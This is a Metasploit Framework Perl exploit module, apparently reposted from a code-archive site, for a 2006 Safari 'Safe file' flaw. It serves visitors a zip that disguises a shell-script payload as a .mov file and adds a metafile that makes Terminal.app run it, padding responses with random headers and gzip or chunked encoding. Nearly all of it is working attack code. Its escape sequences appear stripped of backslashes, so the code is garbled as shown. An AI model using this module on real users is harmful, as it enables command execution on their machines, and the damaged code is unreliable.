##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::safari_safefiles_exec;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use IPC::Open3;
use FindBin qw{$RealBin};

 my $advanced =
  {
	'Gzip'       => [1, 'Enable gzip content encoding'],
	'Chunked'    => [1, 'Enable chunked transfer encoding'],
  };

my $info =
  {
	'Name'           => 'Safari Archive Metadata Command Execution',
	'Version'        => '$Revision: 1.3 $',
	'Authors'        =>
	  [
		'H D Moore <hdm [at] metasploit.com',
	  ],

	'Description'    =>
	  Pex::Text::Freeform(qq{
		This module exploits a vulnerability in Safari's "Safe file" feature, which will
		automatically open any file with one of the allowed extensions. This can be abused
		by supplying a zip file, containing a shell script, with a metafile indicating
		that the file should be opened by Terminal.app. This module depends on
		the 'zip' command-line utility.
}),

	'Arch'           => [  ],
	'OS'             => [  ],
	'Priv'           => 0,

	'UserOpts'       =>
	  {
		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
	  	'REALHOST' => [ 0, 'HOST', 'External address to use for redirects (NAT)' ],
	  },

	'Payload'        =>
	  {
		'Space'     => 8000,
		'MinNops'   => 0,
		'MaxNops'   => 0,
		'Keys'     => ['cmd', 'cmd_bash'],
	  },
	'Refs'           =>
	  [
		['URL', 'http://www.heise.de/english/newsticker/news/69862'],
		['BID', '16736'],
	  ],

	'DefaultTarget'  => 0,
	'Targets'        =>
	  [
		[ 'Automatic' ]
	  ],

	'Keys'           => [ 'safari' ],

	'DisclosureDate' => 'Feb 21 2006',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit
{
	my $self = shift;
	my $server = IO::Socket::INET->new(
		LocalHost => $self->GetVar('HTTPHOST'),
		LocalPort => $self->GetVar('HTTPPORT'),
		ReuseAddr => 1,
		Listen    => 1,
		Proto     => 'tcp'
	  );
	my $client;

	# Did the listener create fail?
	if (not defined($server)) {
		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
		return;
	}

	my $httphost = $self->GetVar('HTTPHOST');
	$httphost = Pex::Utils::SourceIP('1.2.3.4') if $httphost eq '0.0.0.0';

	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");

	while (defined($client = $server->accept())) {
		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
	}

	return;
}

sub HandleHttpClient
{
	my $self = shift;
	my $fd   = shift;

	# Set the remote host information
	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
		

	# Read the HTTP command
	my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
	my $agent;
	
	# Read in the HTTP headers
	while ((my $line = $fd->RecvLine(10))) {
		
		$line =~ s/^s+|s+$//g;
		
		my ($var, $val) = split(/:/, $line, 2);

		# Break out if we reach the end of the headers
		last if (not defined($var) or not defined($val));

		$agent = $val if $var =~ /User-Agent/i;
	}

	my $target    = $self->Targets->[$self->GetVar('TARGET')];
	my $shellcode = $self->GetVar('EncodedPayload')->RawPayload;
	my $content   = $self->CreateZip($shellcode) || return;
	
	$self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)." bytes of payload...");

	$fd->Send($self->BuildResponse($content));

	select(undef, undef, undef, 0.1);

	$fd->Close();
}

sub RandomHeaders {
	my $self = shift;
	my $head = '';

	while (length($head) < 3072) {
		$head .= "X-" .
		  Pex::Text::AlphaNumText(int(rand(30) + 5)) . ': ' .
		  Pex::Text::AlphaNumText(int(rand(256) + 5))  ."rn";
	}
	return $head;
}


sub BuildResponse {
	my ($self, $content) = @_;

	my $response =
	  "HTTP/1.1 200 OKrn" .
	  $self->RandomHeaders() .
	  "Content-Type: application/ziprn";

	if ($self->GetVar('Gzip')) {
		$response .= "Content-Encoding: gziprn";
		$content = $self->Gzip($content);
	}
	if ($self->GetVar('Chunked')) {
		$response .= "Transfer-Encoding: chunkedrn";
		$content = $self->Chunk($content);
	} else {
		$response .= 'Content-Length: ' . length($content) . "rn" .
		  "Connection: closern";
	}

	$response .= "rn" . $content;

	return $response;
}

sub Chunk {
	my ($self, $content) = @_;

	my $chunked;
	while (length($content)) {
		my $chunk = substr($content, 0, int(rand(10) + 1), '');
		$chunked .= sprintf('%x', length($chunk)) . "rn$chunkrn";
	}
	$chunked .= "0rnrn";

	return $chunked;
}

sub Gzip {
	my $self = shift;
	my $data = shift;
	my $comp = int(rand(5))+5;

	my($wtr, $rdr, $err);

	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
	print $wtr $data;
	close ($wtr);
	local $/;

	return (<$rdr>);
}

# Lame!
sub CreateZip {
	my $self = shift;
	my $cmds = shift;

	my $data = $cmds."n";
	my $name = Pex::Text::AlphaNumText(int(rand(10)+4)).".mov";	
	my $temp = ($ENV{'HOME'} || $RealBin || "/tmp") . "/msf_safari_temp_".Pex::Text::AlphaNumText(16);
	
	if ($self->GotZip != 0) {
		$self->PrintLine("[*] Could not execute the zip command (or zip returned an error)");
		return;		
	}
	
	if (! mkdir($temp,0755)) {
		$self->PrintLine("[*] Could not create a temporary directory: $!");
		return;
	}
	
	if (! chdir($temp)) {
		$self->PrintLine("[*] Could not change into temporary directory: $!");
		$self->Nuke($temp);
		return;
	}
	
	if (! mkdir("$temp/__MACOSX",0755)) {
		$self->PrintLine("[*] Could not create the MACOSX temporary directory: $!");
		return $self->Nuke($temp);
		return;
	}
	
	if (! open(TMP, ">$temp/$name")) {
		$self->PrintLine("[*] Could not create the shell script: $!");
		$self->Nuke($temp);
		return;
	}
	
	print TMP $data;
	close(TMP);
	
	# This is important :)
	chmod(0755, "$temp/$name");
	
	
	if (! open(TMP, ">$temp/__MACOSX/._".$name)) {
		$self->PrintLine("[*] Could not create the metafile: $!");
		$self->Nuke($temp);
		return;
	}
	
	print TMP $self->OSXMetaFile;
	close(TMP);
	
	system("zip", "exploit.zip", $name, "__MACOSX/._".$name);
	
	
	
	if( ! open(TMP, "<"."exploit.zip")) {
		$self->PrintLine("[*] Failed to create exploit.zip (weird zip command?)");
		$self->Nuke($temp);
		return;
	}
	
	my $xzip;
	while (<TMP>) { $xzip .= $_ }
	close (TMP);
	
	$self->Nuke($temp);
	return $xzip;
}

sub Nuke {
	my $self = shift;
	my $temp = shift;
	system("rm", "-rf", $temp);
	return;
}

sub GotZip {
	return system("zip -h >/dev/null 2>&1");
}

sub OSXMetaFile {
	return 
		"x00x05x16x07x00x02x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x02x00x00x00x09x00x00".
		"x00x32x00x00x00x20x00x00x00x02x00x00x00x52x00x00".
		"x05x3ax00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x01x00x00x00x05x08x00x00x04x08x00x00".
		"x00x32x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x04x04x00x00x00x25x2fx41x70x70x6cx69".
		"x63x61x74x69x6fx6ex73x2fx55x74x69x6cx69x74x69x65".
		"x73x2fx54x65x72x6dx69x6ex61x6cx2ex61x70x70x00xec".
		"xecxecxffxecxecxecxffxecxecxecxffxecxecxecxffxec".
		"xecxecxffxecxecxecxffxe1xe1xe1xffxe1xe1xe1xffxe1".
		"xe1xe1xffxe1xe1xe1xffxe1xe1xe1xffxe1xe1xe1xffxe1".
		"xe1xe1xffxe1xe1xe1xffxe6xe6xe6xffxe6xe6xe6xffxe6".
		"xe6xe6xffxe6xe6xe6xffxe6xe6xe6xffxe6xe6xe6xffxe6".
		"xe6xe6xffxe6xe6xe6xffxe9xe9xe9xffxe9xe9xe9xffxe9".
		"xe9xe9xffxe9xe9xe9xffxe9xe9xe9xffxe9xe9xe9xffxe9".
		"xe9xe9xffxe9xe9xe9xffxecxecxecxffxecxecxecxffxec".
		"xecxecxffxecxecxecxffxecxecxecxffxecxecxecxffxec".
		"xecxecxffxecxecxecxffxefxefxefxffxefxefxefxffxef".
		"xefxefxffxefxefxefxffxefxefxefxffxefxefxefxffxef".
		"xefxefxffxefxefxefxffxf3xf3xf3xffxf3xf3xf3xffxf3".
		"xf3xf3xffxf3xf3xf3xffxf3xf3xf3xffxf3xf3xf3xffxf3".
		"xf3xf3xffxf3xf3xf3xffxf6xf6xf6xffxf6xf6xf6xffxf6".
		"xf6xf6xffxf6xf6xf6xffxf6xf6xf6xffxf6xf6xf6xffxf6".
		"xf6xf6xffxf6xf6xf6xffxf8xf8xf8xffxf8xf8xf8xffxf8".
		"xf8xf8xffxf8xf8xf8xffxf8xf8xf8xffxf8xf8xf8xffxf8".
		"xf8xf8xffxf8xf8xf8xffxfcxfcxfcxffxfcxfcxfcxffxfc".
		"xfcxfcxffxfcxfcxfcxffxfcxfcxfcxffxfcxfcxfcxffxfc".
		"xfcxfcxffxfcxfcxfcxffxffxffxffxffxffxffxffxffxff".
		"xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff".
		"xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff".
		"xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff".
		"xffxffxffxffxffxffxa8x00x00x00xa8x00x00x00xa8x00".
		"x00x00xa8x00x00x00xa8x00x00x00xa8x00x00x00xa8x00".
		"x00x00xa8x00x00x00x2ax00x00x00x2ax00x00x00x2ax00".
		"x00x00x2ax00x00x00x2ax00x00x00x2ax00x00x00x2ax00".
		"x00x00x2ax00x00x00x03x00x00x00x03x00x00x00x03x00".
		"x00x00x03x00x00x00x03x00x00x00x03x00x00x00x03x00".
		"x00x00x03x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00".
		"x05x08x00x00x04x08x00x00x00x32x00x5fxd0xacx12xc2".
		"x00x00x00x1cx00x32x00x00x75x73x72x6fx00x00x00x0a".
		"x00x00xffxffx00x00x00x00x01x0dx21x7c";
}
1;

# www.Syue.com [2006-02-22]